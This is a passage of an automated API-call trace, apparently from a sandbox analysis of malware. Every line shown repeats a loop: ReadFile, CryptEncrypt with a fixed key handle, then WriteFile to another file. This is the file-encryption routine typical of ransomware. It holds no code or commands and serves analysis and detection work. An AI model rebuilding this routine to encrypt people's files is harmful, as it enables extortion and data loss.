lpOverlapped=0x0) returned 1 [0279.321] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.321] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.321] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.321] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.321] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.322] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.322] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.322] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.322] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.322] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.322] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.323] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.323] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.323] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.323] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.323] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.323] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.324] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.324] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.324] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.324] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.324] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.324] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.325] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.325] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.325] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.325] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.325] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.326] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.327] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.327] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.328] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, 